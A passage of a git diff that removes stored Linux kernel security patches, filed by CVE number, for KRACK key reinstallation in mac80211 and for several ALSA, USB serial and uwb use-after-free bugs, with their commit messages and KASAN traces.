-Change-Id: I08195a468653062a87eaaa01031b6ee6ab8c7508
-Reported-by: Fengguang Wu <fengguang.wu@intel.com>
-Fixes: fe8c8a126806 ("crypto: more robust crypto_memneq")
-Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
-Acked-By: Cesar Eduardo Barros <cesarb@cesarb.eti.br>
-Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
----
- crypto/memneq.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/crypto/memneq.c b/crypto/memneq.c
-index a285a744bc7..3cfae80ed48 100644
---- a/crypto/memneq.c
-+++ b/crypto/memneq.c
-@@ -109,8 +109,9 @@ static inline unsigned long __crypto_memneq_16(const void *a, const void *b)
- 		OPTIMIZER_HIDE_VAR(neq);
- 		neq |= *(unsigned int *)(a+12) ^ *(unsigned int *)(b+12);
- 		OPTIMIZER_HIDE_VAR(neq);
--	} else {
-+	} else
- #endif /* CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS */
-+	{
- 		neq |= *(unsigned char *)(a)    ^ *(unsigned char *)(b);
- 		OPTIMIZER_HIDE_VAR(neq);
- 		neq |= *(unsigned char *)(a+1)  ^ *(unsigned char *)(b+1);
diff --git a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0004.patch
deleted file mode 100644
index fb4c991f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080-Extra/ANY/0004.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 706ccb5adc54e349c491ebeb462c121d6467c863 Mon Sep 17 00:00:00 2001
-From: "Jason A. Donenfeld" <Jason@zx2c4.com>
-Date: Tue, 17 Oct 2017 20:32:07 +0200
-Subject: [PATCH] mac80211: use constant time comparison with keys
-
-Otherwise we risk leaking information via timing side channel.
-
-Change-Id: I9d6f1a4606312d3854746aa2eec2ec46d5629a2b
-Fixes: fdf7cb4185b6 ("mac80211: accept key reinstall without changing anything")
-Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
----
- net/mac80211/key.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/net/mac80211/key.c b/net/mac80211/key.c
-index cebe30315d9..6d804cc2736 100644
---- a/net/mac80211/key.c
-+++ b/net/mac80211/key.c
-@@ -18,6 +18,7 @@
- #include <linux/slab.h>
- #include <linux/export.h>
- #include <net/mac80211.h>
-+#include <crypto/algapi.h>
- #include <asm/unaligned.h>
- #include "ieee80211_i.h"
- #include "driver-ops.h"
-@@ -494,7 +495,7 @@ int ieee80211_key_link(struct ieee80211_key *key,
- 	 * new version of the key to avoid nonce reuse or replay issues.
- 	 */
- 	if (old_key && key->conf.keylen == old_key->conf.keylen &&
--	    !memcmp(key->conf.key, old_key->conf.key, key->conf.keylen)) {
-+	    !crypto_memneq(key->conf.key, old_key->conf.key, key->conf.keylen)) {
- 		ieee80211_key_free_unused(key);
- 		ret = 0;
- 		goto out;
diff --git a/Patches/Linux_CVEs/CVE-2017-13080/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-13080/ANY/0001.patch
deleted file mode 100644
index 92d3bf73..00000000
--- a/Patches/Linux_CVEs/CVE-2017-13080/ANY/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 39fb5459ecd16779e75d76827fb32d15a995f469 Mon Sep 17 00:00:00 2001
-From: Johannes Berg <johannes.berg@intel.com>
-Date: Tue, 5 Sep 2017 14:54:54 +0200
-Subject: [PATCH] mac80211: accept key reinstall without changing anything
-
-When a key is reinstalled we can reset the replay counters
-etc. which can lead to nonce reuse and/or replay detection
-being impossible, breaking security properties, as described
-in the "KRACK attacks".
-
-In particular, CVE-2017-13080 applies to GTK rekeying that
-happened in firmware while the host is in D3, with the second
-part of the attack being done after the host wakes up. In
-this case, the wpa_supplicant mitigation isn't sufficient
-since wpa_supplicant doesn't know the GTK material.
-
-In case this happens, simply silently accept the new key
-coming from userspace but don't take any action on it since
-it's the same key; this keeps the PN replay counters intact.
-
-Change-Id: Id95f656ce3caabd166143cbd562fa4efc2db1385
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
----
- net/mac80211/key.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/net/mac80211/key.c b/net/mac80211/key.c
-index 5bb600d93d7..cebe30315d9 100644
---- a/net/mac80211/key.c
-+++ b/net/mac80211/key.c
-@@ -3,6 +3,7 @@
-  * Copyright 2005-2006, Devicescape Software, Inc.
-  * Copyright 2006-2007	Jiri Benc <jbenc@suse.cz>
-  * Copyright 2007-2008	Johannes Berg <johannes@sipsolutions.net>
-+ * Copyright 2015-2017	Intel Deutschland GmbH
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 as
-@@ -452,9 +453,6 @@ int ieee80211_key_link(struct ieee80211_key *key,
- 
- 	pairwise = key->conf.flags & IEEE80211_KEY_FLAG_PAIRWISE;
- 	idx = key->conf.keyidx;
--	key->local = sdata->local;
--	key->sdata = sdata;
--	key->sta = sta;
- 
- 	if (sta) {
- 		/*
-@@ -491,6 +489,21 @@ int ieee80211_key_link(struct ieee80211_key *key,
- 	else
- 		old_key = key_mtx_dereference(sdata->local, sdata->keys[idx]);
- 
-+	/*
-+	 * Silently accept key re-installation without really installing the
-+	 * new version of the key to avoid nonce reuse or replay issues.
-+	 */
-+	if (old_key && key->conf.keylen == old_key->conf.keylen &&
-+	    !memcmp(key->conf.key, old_key->conf.key, key->conf.keylen)) {
-+		ieee80211_key_free_unused(key);
-+		ret = 0;
-+		goto out;
-+	}
-+
-+	key->local = sdata->local;
-+	key->sdata = sdata;
-+	key->sta = sta;
-+
- 	increment_tailroom_need_count(sdata);
- 
- 	__ieee80211_key_replace(sdata, sta, pairwise, old_key, key);
-@@ -500,6 +513,7 @@ int ieee80211_key_link(struct ieee80211_key *key,
- 
- 	ret = ieee80211_key_enable_hw_accel(key);
- 
-+ out:
- 	mutex_unlock(&sdata->local->key_mtx);
- 
- 	return ret;
diff --git a/Patches/Linux_CVEs/CVE-2017-15265/^4.14/0001.patch b/Patches/Linux_CVEs/CVE-2017-15265/^4.14/0001.patch
deleted file mode 100644
index 496d1dea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-15265/^4.14/0001.patch
+++ /dev/null
@@ -1,142 +0,0 @@
-From 035e6d0b5b192ff5e168ed322304d29db108d790 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Mon, 9 Oct 2017 11:09:20 +0200
-Subject: ALSA: seq: Fix use-after-free at creating a port
-
-commit 71105998845fb012937332fe2e806d443c09e026 upstream.
-
-There is a potential race window opened at creating and deleting a
-port via ioctl, as spotted by fuzzing.  snd_seq_create_port() creates
-a port object and returns its pointer, but it doesn't take the
-refcount, thus it can be deleted immediately by another thread.
-Meanwhile, snd_seq_ioctl_create_port() still calls the function
-snd_seq_system_client_ev_port_start() with the created port object
-that is being deleted, and this triggers use-after-free like:
-
- BUG: KASAN: use-after-free in snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] at addr ffff8801f2241cb1
- =============================================================================
- BUG kmalloc-512 (Tainted: G    B          ): kasan: bad access detected
- -----------------------------------------------------------------------------
- INFO: Allocated in snd_seq_create_port+0x94/0x9b0 [snd_seq] age=1 cpu=3 pid=4511
- 	___slab_alloc+0x425/0x460
- 	__slab_alloc+0x20/0x40
-  	kmem_cache_alloc_trace+0x150/0x190
-	snd_seq_create_port+0x94/0x9b0 [snd_seq]
-	snd_seq_ioctl_create_port+0xd1/0x630 [snd_seq]
- 	snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
- 	snd_seq_ioctl+0x40/0x80 [snd_seq]
- 	do_vfs_ioctl+0x54b/0xda0
- 	SyS_ioctl+0x79/0x90
- 	entry_SYSCALL_64_fastpath+0x16/0x75
- INFO: Freed in port_delete+0x136/0x1a0 [snd_seq] age=1 cpu=2 pid=4717
- 	__slab_free+0x204/0x310
- 	kfree+0x15f/0x180
- 	port_delete+0x136/0x1a0 [snd_seq]
- 	snd_seq_delete_port+0x235/0x350 [snd_seq]
- 	snd_seq_ioctl_delete_port+0xc8/0x180 [snd_seq]
- 	snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
- 	snd_seq_ioctl+0x40/0x80 [snd_seq]
- 	do_vfs_ioctl+0x54b/0xda0
- 	SyS_ioctl+0x79/0x90
- 	entry_SYSCALL_64_fastpath+0x16/0x75
- Call Trace:
-  [<ffffffff81b03781>] dump_stack+0x63/0x82
-  [<ffffffff81531b3b>] print_trailer+0xfb/0x160
-  [<ffffffff81536db4>] object_err+0x34/0x40
-  [<ffffffff815392d3>] kasan_report.part.2+0x223/0x520
-  [<ffffffffa07aadf4>] ? snd_seq_ioctl_create_port+0x504/0x630 [snd_seq]
-  [<ffffffff815395fe>] __asan_report_load1_noabort+0x2e/0x30
-  [<ffffffffa07aadf4>] snd_seq_ioctl_create_port+0x504/0x630 [snd_seq]
-  [<ffffffffa07aa8f0>] ? snd_seq_ioctl_delete_port+0x180/0x180 [snd_seq]
-  [<ffffffff8136be50>] ? taskstats_exit+0xbc0/0xbc0
-  [<ffffffffa07abc5c>] snd_seq_do_ioctl+0x11c/0x190 [snd_seq]
-  [<ffffffffa07abd10>] snd_seq_ioctl+0x40/0x80 [snd_seq]
-  [<ffffffff8136d433>] ? acct_account_cputime+0x63/0x80
-  [<ffffffff815b515b>] do_vfs_ioctl+0x54b/0xda0
-  .....
-
-We may fix this in a few different ways, and in this patch, it's fixed
-simply by taking the refcount properly at snd_seq_create_port() and
-letting the caller unref the object after use.  Also, there is another
-potential use-after-free by sprintf() call in snd_seq_create_port(),
-and this is moved inside the lock.
-
-This fix covers CVE-2017-15265.
-
-Reported-and-tested-by: Michael23 Yu <ycqzsy@gmail.com>
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- sound/core/seq/seq_clientmgr.c | 6 +++++-
- sound/core/seq/seq_ports.c     | 7 +++++--
- 2 files changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/sound/core/seq/seq_clientmgr.c b/sound/core/seq/seq_clientmgr.c
-index 4a24041..41347ad 100644
---- a/sound/core/seq/seq_clientmgr.c
-+++ b/sound/core/seq/seq_clientmgr.c
-@@ -1260,6 +1260,7 @@ static int snd_seq_ioctl_create_port(struct snd_seq_client *client,
- 	struct snd_seq_client_port *port;
- 	struct snd_seq_port_info info;
- 	struct snd_seq_port_callback *callback;
-+	int port_idx;
- 
- 	if (copy_from_user(&info, arg, sizeof(info)))
- 		return -EFAULT;
-@@ -1273,7 +1274,9 @@ static int snd_seq_ioctl_create_port(struct snd_seq_client *client,
- 		return -ENOMEM;
- 
- 	if (client->type == USER_CLIENT && info.kernel) {
--		snd_seq_delete_port(client, port->addr.port);
-+		port_idx = port->addr.port;
-+		snd_seq_port_unlock(port);
-+		snd_seq_delete_port(client, port_idx);
- 		return -EINVAL;
- 	}
- 	if (client->type == KERNEL_CLIENT) {
-@@ -1295,6 +1298,7 @@ static int snd_seq_ioctl_create_port(struct snd_seq_client *client,
- 
- 	snd_seq_set_port_info(port, &info);
- 	snd_seq_system_client_ev_port_start(port->addr.client, port->addr.port);
-+	snd_seq_port_unlock(port);
- 
- 	if (copy_to_user(arg, &info, sizeof(info)))
- 		return -EFAULT;
-diff --git a/sound/core/seq/seq_ports.c b/sound/core/seq/seq_ports.c
-index 9c1c8d5..1ddae91 100644
---- a/sound/core/seq/seq_ports.c
-+++ b/sound/core/seq/seq_ports.c
-@@ -122,7 +122,9 @@ static void port_subs_info_init(struct snd_seq_port_subs_info *grp)
- }
- 
- 
--/* create a port, port number is returned (-1 on failure) */
-+/* create a port, port number is returned (-1 on failure);
-+ * the caller needs to unref the port via snd_seq_port_unlock() appropriately
-+ */
- struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client,
- 						int port)
- {
-@@ -151,6 +153,7 @@ struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client,
- 	snd_use_lock_init(&new_port->use_lock);
- 	port_subs_info_init(&new_port->c_src);
- 	port_subs_info_init(&new_port->c_dest);
-+	snd_use_lock_use(&new_port->use_lock);
- 
- 	num = port >= 0 ? port : 0;
- 	mutex_lock(&client->ports_mutex);
-@@ -165,9 +168,9 @@ struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client,
- 	list_add_tail(&new_port->list, &p->list);
- 	client->num_ports++;
- 	new_port->addr.port = num;	/* store the port number in the port */
-+	sprintf(new_port->name, "port-%d", num);
- 	write_unlock_irqrestore(&client->ports_lock, flags);
- 	mutex_unlock(&client->ports_mutex);
--	sprintf(new_port->name, "port-%d", num);
- 
- 	return new_port;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0001.patch
deleted file mode 100644
index 032674db..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From bd998c2e0df0469707503023d50d46cf0b10c787 Mon Sep 17 00:00:00 2001
-From: Johan Hovold <johan@kernel.org>
-Date: Wed, 4 Oct 2017 11:01:12 +0200
-Subject: [PATCH] USB: serial: console: fix use-after-free on disconnect
-
-A clean-up patch removing two redundant NULL-checks from the console
-disconnect handler inadvertently also removed a third check. This could
-lead to the struct usb_serial being prematurely freed by the console
-code when a driver accepts but does not register any ports for an
-interface which also lacks endpoint descriptors.
-
-Fixes: 0e517c93dc02 ("USB: serial: console: clean up sanity checks")
-Cc: stable <stable@vger.kernel.org>     # 4.11
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Signed-off-by: Johan Hovold <johan@kernel.org>
----
- drivers/usb/serial/console.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/usb/serial/console.c b/drivers/usb/serial/console.c
-index fdf89800ebc3f..ed8ba3ef5c794 100644
---- a/drivers/usb/serial/console.c
-+++ b/drivers/usb/serial/console.c
-@@ -265,7 +265,7 @@ static struct console usbcons = {
- 
- void usb_serial_console_disconnect(struct usb_serial *serial)
- {
--	if (serial->port[0] == usbcons_info.port) {
-+	if (serial->port[0] && serial->port[0] == usbcons_info.port) {
- 		usb_serial_console_exit();
- 		usb_serial_put(serial);
- 	}
diff --git a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0002.patch b/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0002.patch
deleted file mode 100644
index 6fb2a047..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16525/^4.13/0002.patch
+++ /dev/null
@@ -1,29 +0,0 @@
-From 299d7572e46f98534033a9e65973f13ad1ce9047 Mon Sep 17 00:00:00 2001
-From: Johan Hovold <johan@kernel.org>
-Date: Wed, 4 Oct 2017 11:01:13 +0200
-Subject: [PATCH] USB: serial: console: fix use-after-free after failed setup
-
-Make sure to reset the USB-console port pointer when console setup fails
-in order to avoid having the struct usb_serial be prematurely freed by
-the console code when the device is later disconnected.
-
-Fixes: 73e487fdb75f ("[PATCH] USB console: fix disconnection issues")
-Cc: stable <stable@vger.kernel.org>	# 2.6.18
-Acked-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Signed-off-by: Johan Hovold <johan@kernel.org>
----
- drivers/usb/serial/console.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/drivers/usb/serial/console.c b/drivers/usb/serial/console.c
-index ed8ba3ef5c794..43a862a90a775 100644
---- a/drivers/usb/serial/console.c
-+++ b/drivers/usb/serial/console.c
-@@ -186,6 +186,7 @@ static int usb_console_setup(struct console *co, char *options)
- 	tty_kref_put(tty);
-  reset_open_count:
- 	port->port.count = 0;
-+	info->port = NULL;
- 	usb_autopm_put_interface(serial->interface);
-  error_get_interface:
- 	usb_serial_put(serial);
diff --git a/Patches/Linux_CVEs/CVE-2017-16526/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16526/^4.13/0001.patch
deleted file mode 100644
index 4ba88198..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16526/^4.13/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From bbf26183b7a6236ba602f4d6a2f7cade35bba043 Mon Sep 17 00:00:00 2001
-From: Andrey Konovalov <andreyknvl@google.com>
-Date: Thu, 14 Sep 2017 14:30:55 +0200
-Subject: [PATCH] uwb: properly check kthread_run return value
-
-uwbd_start() calls kthread_run() and checks that the return value is
-not NULL. But the return value is not NULL in case kthread_run() fails,
-it takes the form of ERR_PTR(-EINTR).
-
-Use IS_ERR() instead.
-
-Also add a check to uwbd_stop().
-
-Signed-off-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/uwb/uwbd.c | 12 ++++++++----
- 1 file changed, 8 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/uwb/uwbd.c b/drivers/uwb/uwbd.c
-index 01c20a260a8b3..39dd4ef53c779 100644
---- a/drivers/uwb/uwbd.c
-+++ b/drivers/uwb/uwbd.c
-@@ -302,18 +302,22 @@ static int uwbd(void *param)
- /** Start the UWB daemon */
- void uwbd_start(struct uwb_rc *rc)
- {
--	rc->uwbd.task = kthread_run(uwbd, rc, "uwbd");
--	if (rc->uwbd.task == NULL)
-+	struct task_struct *task = kthread_run(uwbd, rc, "uwbd");
-+	if (IS_ERR(task)) {
-+		rc->uwbd.task = NULL;
- 		printk(KERN_ERR "UWB: Cannot start management daemon; "
- 		       "UWB won't work\n");
--	else
-+	} else {
-+		rc->uwbd.task = task;
- 		rc->uwbd.pid = rc->uwbd.task->pid;
-+	}
- }
- 
- /* Stop the UWB daemon and free any unprocessed events */
- void uwbd_stop(struct uwb_rc *rc)
- {
--	kthread_stop(rc->uwbd.task);
-+	if (rc->uwbd.task)
-+		kthread_stop(rc->uwbd.task);
- 	uwbd_flush(rc);
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16527/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16527/^4.13/0001.patch
deleted file mode 100644
index 6a748276..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16527/^4.13/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From 124751d5e63c823092060074bd0abaae61aaa9c4 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Tue, 10 Oct 2017 14:10:32 +0200
-Subject: [PATCH] ALSA: usb-audio: Kill stray URB at exiting
-
-USB-audio driver may leave a stray URB for the mixer interrupt when it
-exits by some error during probe.  This leads to a use-after-free
-error as spotted by syzkaller like:
-  ==================================================================
-  BUG: KASAN: use-after-free in snd_usb_mixer_interrupt+0x604/0x6f0
-  Call Trace:
-   <IRQ>
-   __dump_stack lib/dump_stack.c:16
-   dump_stack+0x292/0x395 lib/dump_stack.c:52
-   print_address_description+0x78/0x280 mm/kasan/report.c:252
-   kasan_report_error mm/kasan/report.c:351
-   kasan_report+0x23d/0x350 mm/kasan/report.c:409
-   __asan_report_load8_noabort+0x19/0x20 mm/kasan/report.c:430
-   snd_usb_mixer_interrupt+0x604/0x6f0 sound/usb/mixer.c:2490
-   __usb_hcd_giveback_urb+0x2e0/0x650 drivers/usb/core/hcd.c:1779
-   ....
-
-  Allocated by task 1484:
-   save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
-   save_stack+0x43/0xd0 mm/kasan/kasan.c:447
-   set_track mm/kasan/kasan.c:459
-   kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:551
-   kmem_cache_alloc_trace+0x11e/0x2d0 mm/slub.c:2772
-   kmalloc ./include/linux/slab.h:493
-   kzalloc ./include/linux/slab.h:666
-   snd_usb_create_mixer+0x145/0x1010 sound/usb/mixer.c:2540
-   create_standard_mixer_quirk+0x58/0x80 sound/usb/quirks.c:516
-   snd_usb_create_quirk+0x92/0x100 sound/usb/quirks.c:560
-   create_composite_quirk+0x1c4/0x3e0 sound/usb/quirks.c:59
-   snd_usb_create_quirk+0x92/0x100 sound/usb/quirks.c:560
-   usb_audio_probe+0x1040/0x2c10 sound/usb/card.c:618
-   ....
-
-  Freed by task 1484:
-   save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
-   save_stack+0x43/0xd0 mm/kasan/kasan.c:447
-   set_track mm/kasan/kasan.c:459
-   kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:524
-   slab_free_hook mm/slub.c:1390
-   slab_free_freelist_hook mm/slub.c:1412
-   slab_free mm/slub.c:2988
-   kfree+0xf6/0x2f0 mm/slub.c:3919
-   snd_usb_mixer_free+0x11a/0x160 sound/usb/mixer.c:2244
-   snd_usb_mixer_dev_free+0x36/0x50 sound/usb/mixer.c:2250
-   __snd_device_free+0x1ff/0x380 sound/core/device.c:91
-   snd_device_free_all+0x8f/0xe0 sound/core/device.c:244
-   snd_card_do_free sound/core/init.c:461
-   release_card_device+0x47/0x170 sound/core/init.c:181
-   device_release+0x13f/0x210 drivers/base/core.c:814
-   ....
-
-Actually such a URB is killed properly at disconnection when the
-device gets probed successfully, and what we need is to apply it for
-the error-path, too.
-
-In this patch, we apply snd_usb_mixer_disconnect() at releasing.
-Also introduce a new flag, disconnected, to struct usb_mixer_interface
-for not performing the disconnection procedure twice.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/mixer.c | 12 ++++++++++--
- sound/usb/mixer.h |  2 ++
- 2 files changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
-index 9732edf77f860..91bc8f18791e4 100644
---- a/sound/usb/mixer.c
-+++ b/sound/usb/mixer.c
-@@ -2234,6 +2234,9 @@ static int parse_audio_unit(struct mixer_build *state, int unitid)
- 
- static void snd_usb_mixer_free(struct usb_mixer_interface *mixer)
- {
-+	/* kill pending URBs */
-+	snd_usb_mixer_disconnect(mixer);
-+
- 	kfree(mixer->id_elems);
- 	if (mixer->urb) {
- 		kfree(mixer->urb->transfer_buffer);
-@@ -2584,8 +2587,13 @@ int snd_usb_create_mixer(struct snd_usb_audio *chip, int ctrlif,
- 
- void snd_usb_mixer_disconnect(struct usb_mixer_interface *mixer)
- {
--	usb_kill_urb(mixer->urb);
--	usb_kill_urb(mixer->rc_urb);
-+	if (mixer->disconnected)
-+		return;
-+	if (mixer->urb)
-+		usb_kill_urb(mixer->urb);
-+	if (mixer->rc_urb)
-+		usb_kill_urb(mixer->rc_urb);
-+	mixer->disconnected = true;
- }
- 
- #ifdef CONFIG_PM
-diff --git a/sound/usb/mixer.h b/sound/usb/mixer.h
-index 2b4b067646ab0..545d99b09706b 100644
---- a/sound/usb/mixer.h
-+++ b/sound/usb/mixer.h
-@@ -22,6 +22,8 @@ struct usb_mixer_interface {
- 	struct urb *rc_urb;
- 	struct usb_ctrlrequest *rc_setup_packet;
- 	u8 rc_buffer[6];
-+
-+	bool disconnected;
- };
- 
- #define MAX_CHANNELS	16	/* max logical channels */
diff --git a/Patches/Linux_CVEs/CVE-2017-16528/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16528/^4.13/0001.patch
deleted file mode 100644
index b4e444be..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16528/^4.13/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From fc27fe7e8deef2f37cba3f2be2d52b6ca5eb9d57 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Tue, 12 Sep 2017 12:41:20 +0200
-Subject: [PATCH] ALSA: seq: Cancel pending autoload work at unbinding device
-
-ALSA sequencer core has a mechanism to load the enumerated devices
-automatically, and it's performed in an off-load work.  This seems
-causing some race when a sequencer is removed while the pending
-autoload work is running.  As syzkaller spotted, it may lead to some
-use-after-free:
-  BUG: KASAN: use-after-free in snd_rawmidi_dev_seq_free+0x69/0x70
-  sound/core/rawmidi.c:1617
-  Write of size 8 at addr ffff88006c611d90 by task kworker/2:1/567
-
-  CPU: 2 PID: 567 Comm: kworker/2:1 Not tainted 4.13.0+ #29
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Workqueue: events autoload_drivers
-  Call Trace:
-   __dump_stack lib/dump_stack.c:16 [inline]
-   dump_stack+0x192/0x22c lib/dump_stack.c:52
-   print_address_description+0x78/0x280 mm/kasan/report.c:252
-   kasan_report_error mm/kasan/report.c:351 [inline]
-   kasan_report+0x230/0x340 mm/kasan/report.c:409
-   __asan_report_store8_noabort+0x1c/0x20 mm/kasan/report.c:435
-   snd_rawmidi_dev_seq_free+0x69/0x70 sound/core/rawmidi.c:1617
-   snd_seq_dev_release+0x4f/0x70 sound/core/seq_device.c:192
-   device_release+0x13f/0x210 drivers/base/core.c:814
-   kobject_cleanup lib/kobject.c:648 [inline]
-   kobject_release lib/kobject.c:677 [inline]
-   kref_put include/linux/kref.h:70 [inline]
-   kobject_put+0x145/0x240 lib/kobject.c:694
-   put_device+0x25/0x30 drivers/base/core.c:1799
-   klist_devices_put+0x36/0x40 drivers/base/bus.c:827
-   klist_next+0x264/0x4a0 lib/klist.c:403
-   next_device drivers/base/bus.c:270 [inline]
-   bus_for_each_dev+0x17e/0x210 drivers/base/bus.c:312
-   autoload_drivers+0x3b/0x50 sound/core/seq_device.c:117
-   process_one_work+0x9fb/0x1570 kernel/workqueue.c:2097
-   worker_thread+0x1e4/0x1350 kernel/workqueue.c:2231
-   kthread+0x324/0x3f0 kernel/kthread.c:231
-   ret_from_fork+0x25/0x30 arch/x86/entry/entry_64.S:425
-
-The fix is simply to assure canceling the autoload work at removing
-the device.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/seq_device.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/sound/core/seq_device.c b/sound/core/seq_device.c
-index c4acf17e9f5e5..e40a2cba5002a 100644
---- a/sound/core/seq_device.c
-+++ b/sound/core/seq_device.c
-@@ -148,8 +148,10 @@ void snd_seq_device_load_drivers(void)
- 	flush_work(&autoload_work);
- }
- EXPORT_SYMBOL(snd_seq_device_load_drivers);
-+#define cancel_autoload_drivers()	cancel_work_sync(&autoload_work)
- #else
- #define queue_autoload_drivers() /* NOP */
-+#define cancel_autoload_drivers() /* NOP */
- #endif
- 
- /*
-@@ -159,6 +161,7 @@ static int snd_seq_device_dev_free(struct snd_device *device)
- {
- 	struct snd_seq_device *dev = device->device_data;
- 
-+	cancel_autoload_drivers();
- 	put_device(&dev->dev);
- 	return 0;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-16529/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16529/^4.13/0001.patch
deleted file mode 100644
index 3f690299..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16529/^4.13/0001.patch
+++ /dev/null
@@ -1,115 +0,0 @@
-From bfc81a8bc18e3c4ba0cbaa7666ff76be2f998991 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Fri, 22 Sep 2017 16:18:53 +0200
-Subject: [PATCH] ALSA: usb-audio: Check out-of-bounds access by corrupted
- buffer descriptor
-
-When a USB-audio device receives a maliciously adjusted or corrupted
-buffer descriptor, the USB-audio driver may access an out-of-bounce
-value at its parser.  This was detected by syzkaller, something like:
-
-  BUG: KASAN: slab-out-of-bounds in usb_audio_probe+0x27b2/0x2ab0
-  Read of size 1 at addr ffff88006b83a9e8 by task kworker/0:1/24
-  CPU: 0 PID: 24 Comm: kworker/0:1 Not tainted 4.14.0-rc1-42251-gebb2c2437d80 #224
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Workqueue: usb_hub_wq hub_event
-  Call Trace:
-   __dump_stack lib/dump_stack.c:16
-   dump_stack+0x292/0x395 lib/dump_stack.c:52
-   print_address_description+0x78/0x280 mm/kasan/report.c:252
-   kasan_report_error mm/kasan/report.c:351
-   kasan_report+0x22f/0x340 mm/kasan/report.c:409
-   __asan_report_load1_noabort+0x19/0x20 mm/kasan/report.c:427
-   snd_usb_create_streams sound/usb/card.c:248
-   usb_audio_probe+0x27b2/0x2ab0 sound/usb/card.c:605
-   usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
-   really_probe drivers/base/dd.c:413
-   driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
-   __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
-   bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
-   __device_attach+0x26e/0x3d0 drivers/base/dd.c:710
-   device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
-   bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
-   device_add+0xd0b/0x1660 drivers/base/core.c:1835
-   usb_set_configuration+0x104e/0x1870 drivers/usb/core/message.c:1932
-   generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174
-   usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266
